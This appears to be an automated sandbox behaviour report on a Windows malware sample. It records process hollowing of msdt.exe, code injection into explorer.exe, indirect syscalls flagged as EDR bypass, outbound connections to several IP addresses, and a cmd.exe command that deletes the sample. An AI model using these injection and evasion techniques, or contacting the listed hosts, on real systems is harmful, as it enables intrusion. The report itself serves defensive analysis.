Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]	4_2_011B2835
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121C810 mov eax, dword ptr fs:[00000030h]	4_2_0121C810
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194859 mov eax, dword ptr fs:[00000030h]	4_2_01194859
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194859 mov eax, dword ptr fs:[00000030h]	4_2_01194859
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C0854 mov eax, dword ptr fs:[00000030h]	4_2_011C0854
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226870 mov eax, dword ptr fs:[00000030h]	4_2_01226870
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226870 mov eax, dword ptr fs:[00000030h]	4_2_01226870
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121E872 mov eax, dword ptr fs:[00000030h]	4_2_0121E872
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121E872 mov eax, dword ptr fs:[00000030h]	4_2_0121E872
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A2840 mov ecx, dword ptr fs:[00000030h]	4_2_011A2840
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190887 mov eax, dword ptr fs:[00000030h]	4_2_01190887
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121C89D mov eax, dword ptr fs:[00000030h]	4_2_0121C89D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0125A8E4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE8C0 mov eax, dword ptr fs:[00000030h]	4_2_011BE8C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC8F9 mov eax, dword ptr fs:[00000030h]	4_2_011CC8F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC8F9 mov eax, dword ptr fs:[00000030h]	4_2_011CC8F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012608C0 mov eax, dword ptr fs:[00000030h]	4_2_012608C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01258B28 mov eax, dword ptr fs:[00000030h]	4_2_01258B28
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01258B28 mov eax, dword ptr fs:[00000030h]	4_2_01258B28
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264B00 mov eax, dword ptr fs:[00000030h]	4_2_01264B00
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BEB20 mov eax, dword ptr fs:[00000030h]	4_2_011BEB20
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BEB20 mov eax, dword ptr fs:[00000030h]	4_2_011BEB20
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]	4_2_0120EB1D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188B50 mov eax, dword ptr fs:[00000030h]	4_2_01188B50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01238B42 mov eax, dword ptr fs:[00000030h]	4_2_01238B42
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]	4_2_01226B40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]	4_2_01226B40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125AB40 mov eax, dword ptr fs:[00000030h]	4_2_0125AB40
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118CB7E mov eax, dword ptr fs:[00000030h]	4_2_0118CB7E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]	4_2_01244B4B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]	4_2_01244B4B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01262B57 mov eax, dword ptr fs:[00000030h]	4_2_01262B57
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01262B57 mov eax, dword ptr fs:[00000030h]	4_2_01262B57
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01262B57 mov eax, dword ptr fs:[00000030h]	4_2_01262B57
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01262B57 mov eax, dword ptr fs:[00000030h]	4_2_01262B57
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123EB50 mov eax, dword ptr fs:[00000030h]	4_2_0123EB50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]	4_2_01244BB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]	4_2_01244BB0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]	4_2_011A0BBE
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]	4_2_011A0BBE
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]	4_2_011B0BCB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]	4_2_011B0BCB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]	4_2_011B0BCB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0121CBF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]	4_2_01190BCD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]	4_2_01190BCD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]	4_2_01190BCD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BEBFC mov eax, dword ptr fs:[00000030h]	4_2_011BEBFC
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]	4_2_01198BF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]	4_2_01198BF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]	4_2_01198BF0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0123EBD0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]	4_2_011B4A35
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]	4_2_011B4A35
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121CA11 mov eax, dword ptr fs:[00000030h]	4_2_0121CA11
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BEA2E mov eax, dword ptr fs:[00000030h]	4_2_011BEA2E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CCA24 mov eax, dword ptr fs:[00000030h]	4_2_011CCA24
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]	4_2_011A0A5B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]	4_2_011A0A5B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123EA60 mov eax, dword ptr fs:[00000030h]	4_2_0123EA60
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]	4_2_01196A50
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]	4_2_0120CA72
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]	4_2_0120CA72
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]	4_2_011CCA6F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]	4_2_011CCA6F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]	4_2_011CCA6F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C8A90 mov edx, dword ptr fs:[00000030h]	4_2_011C8A90
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]	4_2_0119EA80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264A80 mov eax, dword ptr fs:[00000030h]	4_2_01264A80
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]	4_2_01198AA0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]	4_2_01198AA0

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008A889E memset,WinSqmAddToStreamEx,SysFreeString,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

6_2_008A889E

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008C0C80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_008C0C80

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 3.226.182.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.151.30.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 147.92.43.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.74.89 80	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	NtQueueApcThread: Indirect: 0xE8A4F2	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	NtClose: Indirect: 0xE8A56C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	NtClose: Indirect: 0x10DA56C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	NtQueueApcThread: Indirect: 0x10DA4F2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Memory written: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Thread register set: target process: 2580	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Thread register set: target process: 2580	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 2580	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 870000

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_00892710 memset,GetModuleFileNameW,GetLastError,ShellExecuteExW,CreateThread,GetLastError,GetProcessHeap,HeapFree,GetLastError,

6_2_00892710

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior

Source: explorer.exe, 00000005.00000002.4093500056.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.4091961839.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1661857338.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.1661541002.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4091496578.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000005.00000002.4091961839.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1661857338.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000002.4091961839.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1661857338.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
